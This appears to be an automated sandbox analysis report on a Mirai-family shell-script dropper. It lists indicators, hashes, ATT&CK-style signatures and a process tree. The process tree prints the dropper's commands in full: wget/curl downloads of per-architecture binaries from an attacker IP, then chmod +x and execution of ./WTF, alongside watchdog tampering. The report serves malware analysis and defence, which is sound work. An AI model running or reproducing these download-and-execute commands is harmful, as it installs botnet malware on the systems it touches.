Analysis
-
max time kernel
149s -
max time network
137s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
03-01-2025 03:38
Static task
static1
Behavioral task
behavioral1
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 744 chmod 782 chmod 800 chmod 825 chmod 751 chmod 888 chmod 900 chmod 906 chmod 763 chmod 831 chmod 846 chmod 894 chmod 819 chmod 869 chmod 879 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 745 WTF /tmp/WTF 752 WTF /tmp/WTF 765 WTF /tmp/WTF 784 WTF /tmp/WTF 802 WTF /tmp/WTF 821 WTF /tmp/WTF 826 WTF /tmp/WTF 832 WTF /tmp/WTF 848 WTF /tmp/WTF 870 WTF /tmp/WTF 880 WTF /tmp/WTF 889 WTF /tmp/WTF 895 WTF /tmp/WTF 901 WTF /tmp/WTF 907 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/712/cmdline WTF File opened for reading /proc/856/cmdline WTF File opened for reading /proc/812/cmdline WTF File opened for reading /proc/862/cmdline WTF File opened for reading /proc/873/cmdline WTF File opened for reading /proc/708/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/877/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/714/cmdline WTF File opened for reading /proc/834/cmdline WTF File opened for reading /proc/807/cmdline WTF File opened for reading /proc/823/cmdline WTF File opened for reading /proc/828/cmdline WTF File opened for reading /proc/901/cmdline WTF File opened for reading /proc/719/cmdline WTF File opened for reading /proc/800/cmdline WTF File opened for reading /proc/892/cmdline WTF File opened for reading /proc/858/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/897/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/792/cmdline WTF File opened for reading /proc/801/cmdline WTF File opened for reading /proc/811/cmdline WTF File opened for reading /proc/816/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/794/cmdline WTF File opened for reading /proc/678/cmdline WTF File opened for reading /proc/882/cmdline WTF File opened for reading /proc/904/cmdline WTF File opened for reading /proc/861/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/672/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/431/cmdline WTF File opened for reading /proc/715/cmdline WTF File opened for reading /proc/775/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/679/cmdline WTF File opened for reading /proc/713/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/676/cmdline WTF File opened for reading /proc/874/cmdline WTF File opened for reading /proc/694/cmdline WTF File opened for reading /proc/707/cmdline WTF File opened for reading /proc/720/cmdline WTF File opened for reading /proc/755/cmdline WTF File opened for reading /proc/810/cmdline WTF File opened for reading /proc/852/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 749 curl 750 cat 747 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.m68k curl File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/WTF 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/wind.ppc wget
Processes
-
/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh1⤵
- Writes file to tmp directory
PID:715 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:718
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/catcat wind.x862⤵PID:743
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:745
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749
-
-
/bin/catcat wind.mips2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:752
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:756
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/catcat wind.arc2⤵PID:762
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:768
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/catcat wind.i4682⤵PID:780
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:784
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:785
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/catcat wind.i6862⤵PID:799
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:802
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:804
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/catcat wind.x86_642⤵PID:818
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:822
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/catcat wind.mpsl2⤵PID:824
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:826
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/catcat wind.arm2⤵PID:830
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:832
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:834
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/catcat wind.arm52⤵PID:844
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:848
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat wind.arm62⤵PID:867
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:873
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/catcat wind.arm72⤵PID:878
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:880
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:882
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat wind.ppc2⤵PID:887
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:889
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:891
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/catcat wind.spc2⤵PID:893
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:895
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:897
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/catcat wind.m68k2⤵PID:899
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:901
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:903
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/catcat wind.sh42⤵PID:905
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:907
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD531695f8e13cc48d85194f28fae5b9947
SHA1c0aeffac04584edd671c647e93cfe3732357bca4
SHA25643756b412067a771fb68c6df35ccaf2e5668de697e189cd2a6f847ed5434d20d
SHA5127c1bd7c1857a825e1ddfafc3fc67a0e9a9221ab3ed64374f7a943f91fe08e19b6c200976bae214963c7f2cd1cf3c42624e35de03d125604b1da3a3eb5c914956
-
Filesize
113KB
MD5a1fe5416e612e6715d590130c2a5a9ca
SHA1fc47c47eef1e5a037446eb9e0d2b1711bf5975a3
SHA256212660d32a279ad8f1965a28df06992c62b714d52142e5389e03b5835664043c
SHA5128213076bfba398bb77df85c68ca8d1467b5197a2082237f54017ef0124133d6f63b4b85215916576a2392835f945a6f9c09bc710898993fc99a44f1d740ca890
-
Filesize
217B
MD5b5c5bc11ee843c629fe4dc7b16d9e3c8
SHA1b4f2fc81c39d2c053c55ee06a161655f6546a372
SHA25640e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39
SHA512fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16
-
Filesize
217B
MD57996ac0d48cf7290dc39acdf4c6cbe78
SHA16949f5ef62883990e34538ee5bfdab36b5ddddde
SHA25696db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8
SHA5120eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a
-
Filesize
65KB
MD5c232c1fad117a92e3a2641a8d5b0a173
SHA1d36db31c60f484389283201ef23b674f95c36b65
SHA256291e21671679a5dcec245190911c7c059c1a6ec0b74875bd990e56bbb0ec71ef
SHA512c9f1028c71922f9683c641907fcb790f3e63594788d5e6db2e41d3aa9ec4945fdaa41c209468452a24cf8428e7d40498ac001be2a5ef897743a9c0ef1ddc4c01
-
Filesize
25KB
MD5819856ae59567a9a45f09a578a8701d6
SHA1f10479dba7d8ce69c749bd30461ba4a1e0a75833
SHA256f1eb1a307496e1f0468c7a40e8b64d35e0052d9d1654d4a06b444c8218f9be38
SHA51210223b4bb6d324eeb9d3d0313e4d16b31dbd4111fb0f9c5b5319e539277c0d05dcf67ac802b9c45fbb7248884370cc0ff0855547e5e39b8930aab2e8105090cb